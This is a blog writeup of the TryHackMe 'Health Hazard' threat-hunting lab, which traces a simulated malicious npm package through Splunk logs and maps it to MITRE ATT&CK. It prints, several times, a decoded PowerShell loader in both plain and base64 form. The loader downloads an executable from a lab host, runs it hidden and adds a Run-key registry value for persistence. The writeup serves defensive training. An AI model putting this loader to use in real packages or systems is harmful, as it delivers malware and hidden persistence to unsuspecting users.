Threat Hunting Simulator: Health Hazard - TryHackMe writeup


This writeup covers the new Threat Hunting simulator room ‘Health Hazard’ rated Easy from Tryhackme.
At a high level, the challenge involved going through a splunk log to trace out the attack path, we have all the information needed to complete the challenge in the simulator dashboard itself and this room is a great practice for threat hunting
I’ll walk through my thought process, mistakes, and how I eventually solved it.
Start the simulator and take a look around the dashboard, Make sure you make note of every information here, including the executive summary, threat hunting mission and IOCs(indicator of compromise).
What does each section mean ?
The SIEM tab contains the splunk enterprise version with logs we need to go through.
The My Computer section gives us a remote web based desktop connection to a desktop environment.
The Documentation section contains a overally summary of the company data such as all the user account information, and asset information, including network, subnets and endpoints.
The Timeline is where we map out each and every step we uncover in the attack chain from Initial compromise to privilege escalation and lateral movement. When we submit an attack chain we discovered, we will get to know if its right or not, allowing us to move step by step in this lab.
The Threat Report tab is where we submit a final report proving or disproving the hypothesis, and also submitting a high level attack chain with all the steps.
Understanding some important information
Lets layout some important information we have read so far from the dashboard.
Attacker behaviour:
TryDetectThis Intelligence has identified a coordinated supply chain attack campaign targeting open-source ecosystems, specifically, npm and Python package repositories. The campaign appears to be orchestrated by a threat actor leveraging long-term infiltration of neglected or low-profile projects to weaponize legitimate packages.
The attacker’s strategy involves contributing to moderately used but under-maintained libraries, gaining contributor or maintainer status through helpful commits. Once trusted, they publish malicious updates, embedding post-installation payloads or obfuscated backdoors within version releases that appear minor or maintenance-related.
Indicators of compromise (IoC):
All of these IOCs are important patterns to remember.
Host-Based IOCs
Type Value NPM Package healthchk-lib@1.0.1
Registry Path HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Registry Value Name Windows Update Monitor
Registry Value Data powershell.exe -NoP -W Hidden -EncodedCommand <base64>
Downloaded File Path %APPDATA%\SystemHealthUpdater.exe
PowerShell Command Invoke-WebRequest -Uri ... -OutFile ...
Process Execution powershell.exe -NoP -W Hidden -EncodedCommand ...
Script Artifact Found in package.json
under"postinstall"
Network-Based IOCs
Type Value Download URL http://global-update.wlndows.thm/SystemHealthUpdater.exe
Hostname Contacted global-update.wlndows.thm
Protocol HTTP (unencrypted) Port 80 Traffic Behavior Outbound file download to %APPDATA%
via PowerShell
Mapping the attack #1 — Initial access
Analysis in Splunk
Open the splunk enterprise instance provided, lets do some log analysis. we are provided with many logs across the network, and it is not feasible to go through each and every one of them, so lets do some filtering.
From the attacker behaviour, you may understand that the attack is based on npm and python libraries.
so use a simple OR FILTER in splunk to list only those logs containing npm
and python
keywords.
We have reduced the events to 5, now go through every one of them and understand what triggered the alert, and what is happening in the background, if they seem like a IoC, it probably is part of the attack.
From the first event from down, we can see a command to install a node package called healthchk-lib@1.0.1
, remember this exact package and version was part of the IoC to look out for.
Moving up, we come across this really interesting command execution alert, running a powershell command that is base64 encoded, let’s decode this!
I used cyberchef to decode the base64:
And we have this powershell script:
$dest = "$env:APPDATA\SystemHealthUpdater.exe"
$url = "http://global-update.wlndows.thm/SystemHealthUpdater.exe"
# Download file
Invoke-WebRequest -Uri $url -OutFile $dest
# Base64 encode the command
$encoded = [Convert]::ToBase64String(
[Text.Encoding]::Unicode.GetBytes("Start-Process '$dest'")
)
# Build persistence command
$runCmd = 'powershell.exe -NoP -W Hidden -EncodedCommand ' + $encoded
# Add to registry for persistence
Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' `
-Name 'Windows Update Monitor' -Value $runCmd
The attacker was kind enough to not obfuscate the script and also added comments for us!
The script does this:
Download a executable (.exe) file from a external url and save it to APPDATA folder.
Base64 encode the command
start-process <appdata-path>
run the
start-process
command using powershell — basically run the exe file.Setup windows registry to run the command for persistence.
We have found the way in which the attacker made a Initial access to our network, so lets document the steps in Timeline. Go to Timeline section, and click on Stage 1 of 3 and add the following information.
Adversary step description:
The user `tom@pawpress.me` had installed a compromised NPM package named - `healthchk-lib@1.0.1`. The library post install, ran an encoded command in powershell that further installed a malicious executable from an external url. The executable was run, and set as a registry for persistence.
Tactic: Initial Access
Technique: Supply chain compromise
User: tom@pawpress.me
Timestamp: (Find it from the event in splunk)
List of IOCs: (Just list the stuff you noticed that is part of the IOC list)
healthchk-lib@1.0.1
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
powershell.exe -NoP -W Hidden -EncodedCommand
Found in package.json under "postinstall"
http://global-update.wlndows.thm/SystemHealthUpdater.exe
global-update.wlndows.thm
Outbound file download to %APPDATA% via PowerShell
Submit it, and if its right, you will get to the next step.
Mapping the attack #2 — Execution
We have already gone through this step as part of the initial access, the npm package ran a powershell script that downloaded an executable from an external host. This is part of the execution phrase in MITRE ATT&CK mappings.
Now all you gotta do for this step is to submit the attack chain stage 2 of 3.
Adversary step description:
After installing the npm package, the postinstall.ps1 script was executed which ran a hidden powershell command (which was encoded). this downloaded an .exe from a external host, and saved it to %APPDATA% using invoke-webrequest
Tactic: Execution
Technique: Command and scripting interpreter
User: tom@pawpress.me
Timestamp: (Same as previous)
List of IOCs: (Just list the stuff you noticed that is part of the IOC list)
Powershell command (encoded):
C:\Windows\system32\cmd.exe /d /s /c powershell.exe -NoP -W Hidden -EncodedCommand JABkAGUAcwB0ACAAPQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABTAHkAcwB0AGUAbQBIAGUAYQBsAHQAaABVAHAAZABhAHQAZQByAC4AZQB4AGUAIgANAAoAJAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AZwBsAG8AYgBhAGwALQB1AHAAZABhAHQAZQAuAHcAbABuAGQAbwB3AHMALgB0AGgAbQAvAFMAeQBzAHQAZQBtAEgAZQBhAGwAdABoAFUAcABkAGEAdABlAHIALgBlAHgAZQAiAA0ACgANAAoAIwAgAEQAbwB3AG4AbABvAGEAZAAgAGYAaQBsAGUADQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsACAALQBPAHUAdABGAGkAbABlACAAJABkAGUAcwB0AA0ACgANAAoAIwAgAEIAYQBzAGUANgA0ACAAZQBuAGMAbwBkAGUAIAB0AGgAZQAgAGMAbwBtAG0AYQBuAGQADQAKACQAZQBuAGMAbwBkAGUAZAAgAD0AIABbAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgADQAKACAAIAAgACAAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAiAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAnACQAZABlAHMAdAAnACIAKQANAAoAKQANAAoADQAKACMAIABCAHUAaQBsAGQAIABwAGUAcgBzAGkAcwB0AGUAbgBjAGUAIABjAG8AbQBtAGEAbgBkAA0ACgAkAHIAdQBuAEMAbQBkACAAPQAgACcAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBOAG8AUAAgAC0AVwAgAEgAaQBkAGQAZQBuACAALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAnACAAKwAgACQAZQBuAGMAbwBkAGUAZAANAAoADQAKACMAIABBAGQAZAAgAHQAbwAgAHIAZQBnAGkAcwB0AHIAeQAgAGYAbwByACAAcABlAHIAcwBpAHMAdABlAG4AYwBlAA0ACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAJwBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAnACAAYAANAAoAIAAgACAAIAAtAE4AYQBtAGUAIAAnAFcAaQBuAGQAbwB3AHMAIABVAHAAZABhAHQAZQAgAE0AbwBuAGkAdABvAHIAJwAgAC0AVgBhAGwAdQBlACAAJAByAHUAbgBDAG0AZAA=
decoded powershell command:
$dest = "$env:APPDATA\SystemHealthUpdater.exe"
$url = "http://global-update.wlndows.thm/SystemHealthUpdater.exe"
# Download file
Invoke-WebRequest -Uri $url -OutFile $dest
# Base64 encode the command
$encoded = [Convert]::ToBase64String(
[Text.Encoding]::Unicode.GetBytes("Start-Process '$dest'")
)
# Build persistence command
$runCmd = 'powershell.exe -NoP -W Hidden -EncodedCommand ' + $encoded
# Add to registry for persistence
Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' `
-Name 'Windows Update Monitor' -Value $runCmd
Submit and let’s move on to the last stage.
Mapping the attack #3 — Persistence
From the Powershell script, the last stage was to do persistence. According to MITRE:
Persistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access. Techniques used for persistence include any access, action, or configuration changes that let them maintain their foothold on systems, such as replacing or hijacking legitimate code or adding startup code.
Here the attacker embedded the code to add a value to the registry:
# Add to registry for persistence
Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' `
-Name 'Windows Update Monitor' -Value $runCmd
The HKCU:\Software\Microsoft\Windows\CurrentVersion\Run
Registry is executed everytime the User Login, so this is an persistence mechanism that lets the attacker persist.
Adversary step description:
The attacker creates persistence by modifying the user registry
HKCU:\Software\Microsoft\Windows\CurrentVersion\Run
to have the valuepowershell.exe -NoP -W Hidden -EncodedCommand <base64 encoded command>
. the base64 encoded command is the command to run the executable systemhealthupdater.exe which is originally downloaded from the external host in execution phrase.
Tactic: Persistence
Technique: Boot or Logon autostart execution
User: tom@pawpress.me
Timestamp: (This should be the time after the install and run of powershell command, so the next event after that)
List of IOCs: (Just list the stuff you noticed that is part of the IOC list)
Command run to update the registry:
```
Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' `
-Name 'Windows Update Monitor' -Value $runCmd```
decoded powershell command:
```
$dest = "$env:APPDATA\SystemHealthUpdater.exe"
$url = "http://global-update.wlndows.thm/SystemHealthUpdater.exe"
# Download file
Invoke-WebRequest -Uri $url -OutFile $dest
# Base64 encode the command
$encoded = [Convert]::ToBase64String(
[Text.Encoding]::Unicode.GetBytes("Start-Process '$dest'")
)
# Build persistence command
$runCmd = 'powershell.exe -NoP -W Hidden -EncodedCommand ' + $encoded
# Add to registry for persistence
Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' `
-Name 'Windows Update Monitor' -Value $runCmd```
We have unfolded all the stages of the attack, now submit the attack chain.
Seems like it is proven afterall this evidences we have found, review the ai generated report and click on submit findings.
AI Generated Report
Threat Case Report: Supply Chain Compromise via Malicious NPM Package
Executive Summary
This report outlines a coordinated cyber attack initiated through a compromised NPM package, culminating in persistent system compromise. The attack chain successfully employed three key stages: Initial Access, Execution, and Persistence.
Stage 1: Initial Access - Matching IoC
Description: An NPM package named
healthchk-lib@1.0.1
was installed by usertom@pawpress.me
on the assetpaw-tom
. The package executed a post-install PowerShell command to download and run a malicious executable fromhttp://global-update.wlndows.thm/SystemHealthUpdater.exe
, establishing persistence.Tactic & Technique: Initial Access (TA0001), Supply Chain Compromise (T1195)
Indicators of Compromise (IoC):
healthchk-lib@1.0.1
, PowerShell encoded command, registry entry for persistenceStage 2: Execution
Description: The NPM package’s
postinstall.ps
1
script executed a hidden, encoded PowerShell command. This command utilizedInvoke-WebRequest
to download an executable to%APPDATA%
, facilitating malicious activity.Tactic & Technique: Execution (TA0002), Command and Scripting Interpreter (T1059)
IoC: Encoded PowerShell command and specific URL targeting the asset's
%APPDATA%
directoryStage 3: Persistence
Description: Persistence was achieved through registry modification, setting the executable to run at system startup. The registry path
HKCU:\Software\Microsoft\Windows\CurrentVersion\Run
was updated to execute the PowerShell command silently.Tactic & Technique: Persistence (TA0003), Boot or Logon Autostart Execution (T1547)
IoC: Registry path modification and associated PowerShell command
Impact and Findings
The attack illustrates a sophisticated supply chain compromise using a malicious NPM package to deliver a payload, which maintains persistence through registry modification. This compromise potentially exposes the affected system to further attacks and unauthorized access, necessitating immediate remedial actions to mitigate further risks. Comprehensive investigation and system audits are recommended to prevent recurrence.
That summarises our findings quiet well, go ahead and submit the report if it does for you.
The lab is done, although we did not get the full points, we did get majority of the things right. I recommend you go through the analysis and find what were wrong to learn better.
Subscribe to my newsletter
Read articles from Anirudh directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by

Anirudh
Anirudh
I write about Hacking, CTFs and other interesting security and programming stuff.